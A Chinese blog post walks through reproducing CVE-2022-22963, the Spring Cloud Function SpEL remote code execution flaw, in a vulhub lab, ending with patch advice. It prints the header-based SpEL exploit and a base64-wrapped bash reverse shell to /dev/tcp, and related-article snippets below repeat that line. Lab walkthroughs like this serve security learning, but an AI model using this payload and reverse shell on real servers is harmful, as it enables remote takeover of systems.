CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现

已于 2022-09-25 14:41:55 修改
阅读量5.6k 收藏 26
点赞数 8
分类专栏: 漏洞复现【Free】 文章标签: 安全 web安全
于 2022-08-28 21:19:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44281295/article/details/126573730
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Docker环境:

漏洞环境:

0x06 漏洞复现

0x07 流量分析:

0x08 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。

0x03 漏洞概述:

        在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。

0x04 影响版本:

        3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

0x05 环境搭建:

        Docker环境:

         参考这篇文章(Docker&Docker-compose环境安装_Evan Kang的博客-优快云博客

        漏洞环境:

               1、下载vulhub(Vulhub环境压缩包-网络安全文档类资源-优快云文库

       (GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

                2、进入vulhub/spring/CVE-2022-22963环境

                

                3、启动docker环境

                 4、访问系统(这是一个报错页面不用关系)

0x06 漏洞复现

        访问时用Burp拦截。

         利用POC:

                修改请求方式:

​POST /functionRouter HTTP/1.1

                添加请求体内容:

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xxxx")

xxxx:(为要执行的命令)

                如图:

                 上面执行的为反弹shell命令,经过base64加密之后的内容:(不加密无法成功的)

bash -c {echo,xxx}|{base64,-d}|{bash,-i}

                        ||(Base64)

bash -i >& /dev/tcp/192.168.16.129/1234 0>&1   

结果:

0x07 流量分析:

        请求特征:

0x08 修复建议:

        1、安装官方的补丁

        2、降级到 JDK 8 或更低版本,这将消除被攻击的可能性。

Spring Cloud Function SpEL表达式注入(CVE-2022-22963)
李火火的安全圈
04-02 1419
文章目录声明前言一、漏洞概述二、影响版本三、本地复现四、漏洞原理五、官方修复文档 声明 本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记! 前言 在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。 一、漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 funct
Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963漏洞复现
weixin_54786196的博客
10-27 514
Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2617
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
vulfocus复现Spring Cloud Function SPEL 远程代码执行
woai_zhongguo的博客
07-18 1537
Vulfocus复现Spring Cloud Function SPEL 远程代码执行
Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963
最新发布
qq_62691506的博客
04-06 140
由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。将反弹shell bash -i >& /dev/tcp/监听机ip/监听端口号 0>1& 进行base64加密。出现错误页面,利用burp抓包修改请求路径方法。
CVE-2022-22963Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 993
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3307
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Spring Cloud Function SPEL表达式注入漏洞CVE-2022-22963
chaojixiaojingang
04-06 7732
1.漏洞描述 SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 3412
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
然而,在 SpringCloud Function 中存在一个 SpEL 注入漏洞CVE-2022-22963),该漏洞可能会导致攻击者可以执行恶意代码,从而导致严重的安全问题。 SpELSpring Expression Language)是一种强大的表达式语言,...
CVE-2022-22963 Spring Cloud Function SpEL命令注入
mirocky的博客
10-26 314
Spring Cloud Function 是基于 Spring Boot的函数计算框架。该项目致力于促进函数为主的开发单元,它抽象出所有传输细节和基础架构,并提供一个通用的模型,用于在各种平台上部署基于函数的软件。在Spring Cloud Function相关版本,存在SpEL表达式注入。恶意攻击者无需认证可通过构造特定的 HTTP 请求头注入 SpEL表达式,最终执行任意命令,获取服务器权限。
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3969
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
春秋云境:CVE-2022-22963[漏洞复现]
如有错误感谢斧正
08-10 1249
到2024年8月11日,为期14天的专项国护结束最近都在忙攻防看1day、nday复现,现在有空了写一下靶场的复现
Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现
Pluto.的博客
11-21 1097
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
CVE-2022-22963漏洞复现
XXXXsssxwd的博客
12-23 832
由于SpringCloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。
Spring Cloud Function SPEL 远程代码执行
Cobra的博客
04-24 2497
前言 最近Spring Cloud Function组件爆出0day -- SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。 影响版本 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 漏洞复现 环境来自vulfocus靶场 1、开启环境 2、利用burp抓包,需要给他一个路径 3、在vps开启监听 4、修改数据包,将反弹shell进行base64编码,并添加一个Content-Type .
java批量上传文件
12-27
### Java 实现批量文件上传 为了满足批量文件上传的需求,可以利用Spring Boot框架来构建后端接口。前端可以选择`Vue.js`或者其他技术栈发送请求给这个API。下面是一个简单的例子展示如何通过Java实现批量文件上传。 #### 创建控制器类处理文件上传请求 ```java import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; @RestController @RequestMapping("/api/files") public class FileUploadController { @PostMapping("/uploadMultipleFiles") public String uploadMultipleFiles(@RequestParam("files") MultipartFile[] files) { StringBuilder fileNames = new StringBuilder(); try { for (MultipartFile file : files) { if (!file.isEmpty()) { byte[] bytes = file.getBytes(); // 将文件保存到指定位置... fileNames.append(file.getOriginalFilename()).append(", "); } } return "Successfully uploaded -> " + fileNames.toString().trim().replaceAll(", $", ""); } catch (Exception e) { return "Failed to upload multiple files!"; } } } ``` 此代码片段定义了一个RESTful API `/api/files/uploadMultipleFiles` 接收多个文件作为参数并尝试逐个保存它们[^1]。 #### 配置multipart设置 为了让应用程序能够接收较大的文件以及多份文件,在application.properties中配置如下属性: ```properties spring.servlet.multipart.max-file-size=10MB spring.servlet.multipart.max-request-size=50MB ``` 这些设置允许最大单个文件大小为10 MB,整个HTTP请求的最大尺寸为50 MB。对于更大的文件或者更多的文件数量,可以根据实际情况调整这两个值[^2]。 #### 客户端调用示例(基于JavaScript) 如果使用的是现代浏览器环境下的HTML表单提交,则可以直接在页面上创建一个多选文件输入框,并通过AJAX异步上传至服务器;如果是更复杂的场景比如移动应用或其他平台,则可能需要用到特定SDK或库来进行网络通信操作。 ```javascript const formData = new FormData(); Array.from(document.getElementById('fileInput').files).forEach((file) => { formData.append('files', file); }); fetch('/api/files/uploadMultipleFiles', { method: 'POST', body: formData }) .then(response => response.json()) .then(result => console.log('Success:', result)) .catch(error => console.error('Error:', error)); ``` 这段脚本展示了怎样收集来自用户的选择并将所选中的所有文件打包成FormData对象再发送出去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值